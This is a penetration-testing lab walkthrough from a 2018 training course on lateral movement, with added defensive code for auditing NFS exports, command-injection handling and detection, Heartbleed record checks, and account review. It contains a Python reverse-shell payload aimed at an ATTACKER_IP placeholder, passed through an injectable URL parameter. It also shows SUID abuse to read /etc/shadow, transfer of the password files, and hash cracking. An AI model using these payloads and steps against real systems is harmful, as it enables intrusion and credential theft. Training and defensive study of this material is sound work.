© 2018 Caendra Inc. - Hera For Ptpv5 - Linux Exploitation (Lateral Movement)
1. Netblock: 172.16.80.1/24
2. Domain: robotstogo.localdomain
• Metasploit
• Nmap
• Bash Shell
• Netcat
We’ve obtained access to multiple systems within Robots To Go, Inc.’s environment using a
number of different techniques and exploits. Our next phase is to conduct lateral movement
tasks in order to complete our objectives defined by the customer. Using the knowledge
we’ve gained from previous phases of the engagement, we strengthen our footholds within
the target infrastructure and use the information and credentials we’ve obtained from
compromised hosts to move onto other systems we otherwise didn’t have access to initially.
Below, you can find solutions for each of the Lateral Movement tasks. Remember,
though, that you can follow your own strategy (which may differ from the one
explained in the following lab). Additionally, the labs contain vulnerabilities not
covered below which can also be exploited but may not be required to complete the
tasks. Exploit as many of the vulnerabilities you find as you can!
During our initial enumeration phase, an NFS share on IP address 172.16.80.27 should have
revealed some potentially useful information (a .zip archive). Retrieve the contents of the
archive and use them to gain access to another system.
While enumerating NFS shares, we found that one particular share was accessible and
contained a “backup.zip” file:
Next, we need to mount that NFS share and access the backup.zip archive:
# mkdir /mnt/172.16.80.27_nfs
# mount -t nfs 172.16.80.27:/home/simon /mnt/172.16.80.27_nfs -o nolock
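The share above was mountable by an arbitrary client, which is what the defender should have caught on the NFS server. The following audit script is an added example, not part of the lab; it parses a constructed /etc/exports (an assumption, the lab never shows the target's exports file) and flags the conditions that make a share like /home/simon readable from anywhere.

```python
import re

# Constructed /etc/exports content modelled on the lab's exposed share
# (an assumption; the lab page never shows the target's exports file).
SAMPLE_EXPORTS = """\
# /etc/exports
/home/simon *(rw,sync,no_root_squash)
/srv/backup 172.16.80.0/24(ro,sync)
/srv/data 172.16.80.10(rw,sync,root_squash) 172.16.80.11(rw)
"""

def parse_exports(text):
    """Return (path, client, options) triples, one per client spec.

    A path with no client list, or a spec like '(rw)' with an empty host
    part, is exported to every host, which exportfs writes as '*'.
    """
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        path, *clients = line.split()
        for spec in clients or ["*"]:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            client = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append((path, client, opts))
    return entries

def audit_exports(text):
    """Flag the conditions that let the lab's share be mounted and read by
    an arbitrary client: world exports, no_root_squash, exported homes."""
    findings = []
    for path, client, opts in parse_exports(text):
        if client in ("*", "0.0.0.0/0"):
            findings.append(f"{path}: exported to every host ({client})")
        if "no_root_squash" in opts:
            findings.append(f"{path} -> {client}: no_root_squash set")
        if path.startswith("/home/"):
            findings.append(f"{path} -> {client}: home directory exported")
    return findings

if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

Run it against the real file on an NFS server with `audit_exports(open("/etc/exports").read())`.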
Once the share is mounted, we browse to our local /mnt/172.16.80.27_nfs location and copy
the backup.zip file to our /tmp directory:
# cd /mnt/172.16.80.27_nfs
# cp backup.zip /tmp
# cd /tmp
We quickly find that when attempting to unzip the archive, it is password protected:
# unzip backup.zip
We can use “fcrackzip” to run a dictionary attack against the zip archive using the rockyou.txt
wordlist and, hopefully, access its contents with the following command:
The fcrackzip program successfully cracks the backup.zip archive, and reveals a password of
“====0open/n”:
We can now read the contents of the file in the backup.zip archive:
# cd backup/
# cat notes.txt
TEMP MGMT CONSOLE:
https://172.16.80.24:4433/xl0827_dev_
The “notes.txt” file reveals a hidden web directory on another system, 172.16.80.24, on
port 4433, which we should navigate to:
Clicking on the “here” link within the page reveals a parameter (x=) in the URL of the page:
Reading the message left for the organization's developers, there is a good chance we may be
able to execute arbitrary commands via that parameter. We try with “?x=id”:
url: https://172.16.80.24:4433/xl0827_dev_/?x=id
We’ve confirmed command execution via the “x” parameter! Let’s use that to get a reverse
shell once again with a netcat listener on our attacker machine, but this time, we’ll use a
python reverse shell and execute that from the “x” parameter:
On attacker:
# nc -nlvp 1234
On target system via the “x” parameter of the hidden web page (make sure to change
<ATTACKER_IP> and <ATTACKER_PORT> values to your listener parameters, and also, the
below code may need to be manually typed, as to make sure all characters are properly
URL:
https://172.16.80.24:4433/xl0827_dev_/?x=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER_IP>",<ATTACKER_PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
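The “x” parameter works because the page hands the raw value to a shell. The code below is an added example, not the lab server's code: a constructed handler in the vulnerable shape, the hardened form (a fixed allowlist of actions, no shell), and a detector that picks the lab's kind of payload out of constructed web-server access log lines. Log lines, action names and the `/xl0827_dev_/` path usage are assumptions made for the example.

```python
import subprocess
import urllib.parse

SHELL_METACHARS = set(";|&`$()<>\n")

def run_x_vulnerable(x):
    """Constructed illustration of the bug the lab exploits: the raw "x"
    value is passed to a shell, so "id; other" runs two commands."""
    return subprocess.run(x, shell=True, capture_output=True, text=True).stdout

# Hardened form: "x" may only name one of a few fixed actions, each mapped to
# a fixed argv list; nothing taken from the request ever reaches a shell.
ALLOWED_ACTIONS = {
    "whoami": ["id", "-un"],
    "kernel": ["uname", "-s"],
}

def run_x_hardened(x):
    argv = ALLOWED_ACTIONS.get(x)
    if argv is None:
        raise ValueError(f"action not permitted: {x!r}")
    return subprocess.run(argv, shell=False, capture_output=True, text=True).stdout

def looks_like_injection(x):
    """Detection side: true when a request value carries shell metacharacters
    or an interpreter invocation, the pattern seen in the lab's payload."""
    lowered = x.lower()
    return (bool(SHELL_METACHARS & set(x))
            or any(tok in lowered for tok in ("python -c", "perl -e", "/bin/sh", "/bin/bash")))

def flag_access_log(lines):
    """Return the 1-based numbers of combined-format log lines whose x= value
    looks injected; the query string is URL-decoded before inspection."""
    hits = []
    for n, line in enumerate(lines, 1):
        path = line.split('"')[1].split(" ")[1] if line.count('"') >= 2 else ""
        query = urllib.parse.urlparse(path).query
        if any(looks_like_injection(v) for v in urllib.parse.parse_qs(query).get("x", [])):
            hits.append(n)
    return hits

# Constructed access log sample: a plain probe, then an encoded interpreter call.
SAMPLE_LOG = [
    '172.16.80.5 - - [01/Jan/2018:10:00:00 +0000] "GET /xl0827_dev_/?x=id HTTP/1.1" 200 512',
    '172.16.80.5 - - [01/Jan/2018:10:00:05 +0000] "GET /xl0827_dev_/?x=python%20-c%20%27import%20socket%27 HTTP/1.1" 200 0',
]
```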
We have identified information from an NFS share on the “172.16.80.27” system, and have
used that to obtain access to a hidden directory on 172.16.80.24 as the “www-data” user.
During enumeration, we identify that the system “172.16.80.24” runs a web server on port
4433 over HTTPS. When scanning that port for vulnerabilities, we also discover that it is
vulnerable to Heartbleed. We use the “+” character before the script name so that nmap
forces the check for this vulnerability on port 4433:
Having identified a machine vulnerable to Heartbleed, we use the Metasploit Heartbleed
exploit module to dump contents of the machine's memory in an attempt to get credentials
or other sensitive information we might be able to use to log onto other systems:
Seeing as the exploit was successful, we then run the “strings” command against the resulting
.bin file to reveal some of the information dumped from memory:
# strings /root/.msf4/loot/….openssl.heartble_151722.bin
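Heartbleed works because an unpatched server trusts the payload_length field of a TLS heartbeat message and copies that many bytes back from its own memory. The check below is an added example, not code from the lab or from OpenSSL: it applies the RFC 6520 bounds rule to raw TLS records (the byte strings are constructed samples, not captures from the lab), which is the same test an IDS signature or a patched library applies.

```python
import struct

TLS_HEARTBEAT = 0x18          # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16              # RFC 6520: at least 16 bytes of padding

def parse_tls_record(data):
    """Split one raw TLS record into (content_type, version, fragment)."""
    if len(data) < 5:
        raise ValueError("short record header")
    ctype, version, length = struct.unpack("!BHH", data[:5])
    fragment = data[5:5 + length]
    if len(fragment) != length:
        raise ValueError("record body truncated")
    return ctype, version, fragment

def heartbeat_is_malformed(data):
    """True for a heartbeat record whose declared payload_length does not fit
    inside the record. A patched peer discards such a message; an unpatched
    one answers with payload_length bytes of its own memory, which is what
    the Metasploit module used in the lab collects."""
    ctype, _version, frag = parse_tls_record(data)
    if ctype != TLS_HEARTBEAT:
        return False
    if len(frag) < 3:
        return True
    hb_type, payload_len = struct.unpack("!BH", frag[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return True
    # type(1) + length(2) + payload + minimum padding must fit in the fragment
    return 1 + 2 + payload_len + MIN_PADDING > len(frag)

def flag_heartbeats(records):
    """Return the indexes of malformed records in a captured sequence."""
    return [i for i, rec in enumerate(records) if heartbeat_is_malformed(rec)]

# Constructed sample records (not captured from the lab):
# a well-formed request with the 2-byte payload "hi" and 16 bytes of padding ...
BENIGN_HB = bytes.fromhex("1803020015" "01" "0002" "6869" + "00" * 16)
# ... the same shape declaring 65535 payload bytes while carrying none ...
MALFORMED_HB = bytes.fromhex("1803020013" "01" "ffff" + "00" * 16)
# ... and a handshake record, which the check ignores.
HANDSHAKE = bytes.fromhex("1603010002" "0100")
```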
Looks like some credentials for a user “Amanda.” If we think back to the information
gathering phase, and during enumeration of SMB, we should have noticed a user named
“Amanda” from those findings which were relevant to the “172.16.80.27” machine. We try
the above credentials on the SSH port of the 172.16.80.27 machine:
# ssh amanda@172.16.80.27
And are able to successfully log onto the 172.16.80.27 machine as “amanda” using
credentials we identified from the heartbleed exploit against the 172.16.80.24 machine:
One of our first steps at this point is to start post-exploitation enumeration of the system,
and we realize that “Amanda” can execute a SUID root executable “/usr/local/bin/catme,”
among other things.
We find that the “catme” executable allows reading of any file as root:
$ catme /etc/passwd
In the image above, you'll also notice that the user “damien” has a UID of 0 when we take a
look at the /etc/passwd file. This means that the Damien user is a root user on the system.
Knowing this, and knowing we can also read the /etc/shadow file since the “catme” SUID
executable reads files as root, we will attempt to crack the “damien” user's hash and see if
we can get root access on the system as Damien. We will use “unshadow” to create a file that
“john” can crack, but first we copy both the /etc/passwd and /etc/shadow files to the /tmp
directory on the system, using the SUID executable and redirecting its output:
$ cd /tmp
$ catme /etc/passwd > passwd
$ catme /etc/shadow > shadow
Once we have both the /etc/passwd and /etc/shadow files copied to the /tmp directory, we
need to transfer those to our attacker system. We can spin up a python HTTP server on port
8888 on the target machine, and download the two files to our attacker system:
# wget http://172.16.80.27:8888/passwd
# wget http://172.16.80.27:8888/shadow
Next, on our attacker system, we'll use the “unshadow” program to combine the two files
into a format we can use for cracking with john:
Next, we run john against the shadow.john file, using the “fasttrack.txt” dictionary as the
wordlist:
John quickly cracks the password (secuirty3) for “damien,” and we can now log into
172.16.80.27 as that user. We can also see that our GID is root, and through information
gathering of our current user, we can see that “Damien” is part of the “sudo” group, which
means he should be able to sudo any command as root.
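Both findings on this host, a second UID 0 account and a sudo group member with a dictionary password, are visible in the account files themselves. The audit below is an added example, not part of the lab: it parses constructed /etc/passwd and /etc/group samples (modelled on the lab's findings, not copied from the target) and reports the root-equivalent accounts a baseline check should raise.

```python
# Constructed sample lines modelled on the lab's findings (not the target's files).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
damien:x:0:0:Damien:/home/damien:/bin/bash
amanda:x:1001:1001:Amanda:/home/amanda:/bin/bash
simon:x:1002:1002:Simon:/home/simon:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:damien
users:x:100:
"""

def parse_passwd(text):
    """Map user name -> (uid, gid) from passwd-format text."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, *_rest = line.split(":")
        users[name] = (int(uid), int(gid))
    return users

def parse_group_members(text, group):
    """Return the supplementary members listed for one group."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == group:
            return [m for m in fields[3].split(",") if m]
    return []

def audit_accounts(passwd_text, group_text):
    """Report accounts that are root-equivalent: any UID 0 besides root,
    any primary GID 0 besides root, and every member of the sudo group."""
    findings = []
    for name, (uid, gid) in parse_passwd(passwd_text).items():
        if name == "root":
            continue
        if uid == 0:
            findings.append(f"{name}: UID 0 besides root")
        elif gid == 0:
            findings.append(f"{name}: primary GID 0")
    for member in parse_group_members(group_text, "sudo"):
        findings.append(f"{member}: member of sudo group")
    return findings
```

On a live host, feed it `open("/etc/passwd").read()` and `open("/etc/group").read()`; an empty result is the expected baseline on a system with one root account and no standing sudo members.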
# ssh damien@172.16.80.27
Knowing this information, we can sudo a bash shell and obtain UID 0 status once we enter
Damien’s password:
Root again!